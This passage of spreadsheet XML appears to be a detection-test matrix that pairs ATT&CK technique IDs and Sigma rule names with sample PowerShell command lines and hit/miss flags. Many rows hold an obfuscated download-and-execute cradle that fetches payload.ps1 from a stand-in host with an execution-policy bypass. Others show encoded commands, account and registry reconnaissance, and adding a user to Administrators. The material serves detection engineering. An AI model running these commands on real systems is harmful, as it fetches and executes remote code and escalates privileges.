    <row r="1797" ht="15.75" customHeight="1" s="42">
      <c r="A1797" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1797" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1797" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1797" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1797" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -coMmaND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1797" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1797" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1797" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1797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797" s="43" t="n"/>
      <c r="K1797" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1798" ht="15.75" customHeight="1" s="42">
      <c r="A1798" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1798" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1798" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1798" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1798" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -noProFile -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1798" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1798" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1798" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1798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798" s="43" t="n"/>
      <c r="K1798" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1799" ht="15.75" customHeight="1" s="42">
      <c r="A1799" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1799" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1799" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1799" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1799" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1799" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1799" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1799" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1799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799" s="43" t="n"/>
      <c r="K1799" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1800" ht="15.75" customHeight="1" s="42">
      <c r="A1800" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1800" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1800" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1800" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1800" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ec" JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F1800" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1800" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1800" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1800" s="43" t="n"/>
      <c r="J1800" s="43" t="n"/>
      <c r="K1800" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1801" ht="15.75" customHeight="1" s="42">
      <c r="A1801" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1801" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1801" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1801" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1801" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /"NoLogo" -NonInteractive /"ExecutionPolicy" Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1801" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1801" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1801" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1801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801" s="43" t="n"/>
      <c r="K1801" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1802" ht="15.75" customHeight="1" s="42">
      <c r="A1802" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1802" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1802" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1802" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1802" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nOlOgO -nONINtERaCTIvE -"ExecutionPolicy" Bypass -CoMManD "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1802" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1802" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1802" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1802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802" s="43" t="n"/>
      <c r="K1802" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1803" ht="15.75" customHeight="1" s="42">
      <c r="A1803" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1803" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1803" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1803" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1803" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /"NoLogo" -noniNTeracTiVe -ep Bypass -CoMmand "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1803" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1803" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1803" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1803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803" s="43" t="n"/>
      <c r="K1803" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1804" ht="15.75" customHeight="1" s="42">
      <c r="A1804" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1804" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1804" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1804" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1804" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NOLoGO -nONiNtERactivE -ep Bypass -"Command" "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1804" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1804" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1804" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1804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804" s="43" t="n"/>
      <c r="K1804" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1805" ht="15.75" customHeight="1" s="42">
      <c r="A1805" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1805" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1805" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1805" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1805" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NOlOgO -noNInteractivE -ep Bypass -"Command" "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1805" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1805" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1805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PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0);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805" s="43" t="n"/>
      <c r="K1805" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1806" ht="15.75" customHeight="1" s="42">
      <c r="A1806" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1806" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1806" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1806" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1806" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -"NoLogo" -NonInteractive -exEcutiONPoliCY Bypass /"Command" "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1806" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1806" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1806" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1806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806" s="43" t="n"/>
      <c r="K1806" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1807" ht="15.75" customHeight="1" s="42">
      <c r="A1807" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1807" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1807" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1807" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1807" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1807" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1807" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1807" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1807" s="43" t="n"/>
      <c r="J1807" s="43" t="n"/>
      <c r="K1807" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1808" ht="15.75" customHeight="1" s="42">
      <c r="A1808" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1808" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C1808" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D1808" s="43" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E1808" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand QUdULUxvY2FsR3JvdXBtZW50IC1Hcm91cCAiRG9tYWluIEFkbWlucyI=</t>
        </is>
      </c>
      <c r="F1808" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1808" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1808" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1808" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1808" s="43" t="n"/>
      <c r="K1808" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1809" ht="15.75" customHeight="1" s="42">
      <c r="A1809" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1809" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C1809" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D1809" s="43" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E1809" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" QUdULUxvY2FsR3JvdXBtZW50IC1Hcm91cCAiRG9tYWluIEFkbWlucyI=</t>
        </is>
      </c>
      <c r="F1809" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1809" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1809" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1809" s="43" t="n"/>
      <c r="J1809" s="43" t="n"/>
      <c r="K1809" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1810" ht="15.75" customHeight="1" s="42">
      <c r="A1810" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1810" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C1810" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D1810" s="43" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E1810" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc QUdULUxvY2FsR3JvdXBtZW50IC1Hcm91cCAiRG9tYWluIEFkbWlucyI=</t>
        </is>
      </c>
      <c r="F1810" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1810" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1810" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1810" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1810" s="43" t="n"/>
      <c r="K1810" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1811" ht="15.75" customHeight="1" s="42">
      <c r="A1811" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1811" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C1811" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D1811" s="43" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E1811" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCODeDcOMmAND QUdULUxvY2FsR3JvdXBtZW50IC1Hcm91cCAiRG9tYWluIEFkbWlucyI=</t>
        </is>
      </c>
      <c r="F1811" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1811" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1811" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1811" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1811" s="43" t="n"/>
      <c r="K1811" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1812" ht="15.75" customHeight="1" s="42">
      <c r="A1812" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1812" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C1812" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D1812" s="43" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E1812" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncOdeDCoMmanD QUdULUxvY2FsR3JvdXBtZW50IC1Hcm91cCAiRG9tYWluIEFkbWlucyI=</t>
        </is>
      </c>
      <c r="F1812" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1812" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1812" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1812" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1812" s="43" t="n"/>
      <c r="K1812" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1813" ht="15.75" customHeight="1" s="42">
      <c r="A1813" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1813" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1813" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1813" s="43" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1813" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ChildItem C:\Users"</t>
        </is>
      </c>
      <c r="F1813" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1813" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1813" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1813" s="43" t="n"/>
      <c r="J1813" s="43" t="n"/>
      <c r="K1813" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1814" ht="15.75" customHeight="1" s="42">
      <c r="A1814" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1814" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1814" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1814" s="43" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1814" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F1814" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1814" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1814" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1814" s="43" t="n"/>
      <c r="J1814" s="43" t="n"/>
      <c r="K1814" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1815" ht="15.75" customHeight="1" s="42">
      <c r="A1815" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1815" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1815" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1815" s="43" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1815" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F1815" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1815" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1815" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1815" s="43" t="n"/>
      <c r="J1815" s="43" t="n"/>
      <c r="K1815" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1816" ht="15.75" customHeight="1" s="42">
      <c r="A1816" s="43" t="inlineStr">
        <is>
          <t>t1505.002</t>
        </is>
      </c>
      <c r="B1816" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1816" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1816" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1816" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nOLoGo -"NonInteractive" /"ExecutionPolicy" Bypass -cOMmaND "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1816" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1816" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1816" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1816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816" s="43" t="n"/>
      <c r="K1816" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1817" ht="15.75" customHeight="1" s="42">
      <c r="A1817" s="43" t="inlineStr">
        <is>
          <t>t1505.002</t>
        </is>
      </c>
      <c r="B1817" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1817" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1817" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1817" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -"NonInteractive" -eXecutiOnpOLIcY Bypass -coMMAnd "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1817" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1817" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1817" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1817" s="43" t="inlineStr">
        <is>
          <t>PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775);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1817" s="43" t="n"/>
      <c r="K1817" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1818" ht="15.75" customHeight="1" s="42">
      <c r="A1818" s="43" t="inlineStr">
        <is>
          <t>t1176.001</t>
        </is>
      </c>
      <c r="B1818" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1818" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1818" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1818" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoproFILe -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1818" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1818" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1818" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1818" s="43" t="inlineStr">
        <is>
          <t>PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); PowerShell Download Pattern (3b6ab547-8ec2-4991-b9d2-2b06702a48d7); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1818" s="43" t="n"/>
      <c r="K1818" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1819" ht="15.75" customHeight="1" s="42">
      <c r="A1819" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1819" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1819" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1819" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1819" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F1819" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1819" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1819" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1819" s="43" t="n"/>
      <c r="J1819" s="43" t="n"/>
      <c r="K1819" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1820" ht="15.75" customHeight="1" s="42">
      <c r="A1820" s="43" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B1820" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1820" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1820" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1820" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F1820" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1820" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1820" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1820" s="43" t="n"/>
      <c r="J1820" s="43" t="n"/>
      <c r="K1820" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1821" ht="15.75" customHeight="1" s="42">
      <c r="A1821" s="43" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B1821" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1821" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1821" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1821" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F1821" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1821" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1821" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1821" s="43" t="n"/>
      <c r="J1821" s="43" t="n"/>
      <c r="K1821" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1822" ht="15.75" customHeight="1" s="42">
      <c r="A1822" s="43" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B1822" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1822" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1822" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1822" s="43" t="inlineStr">
        <is>
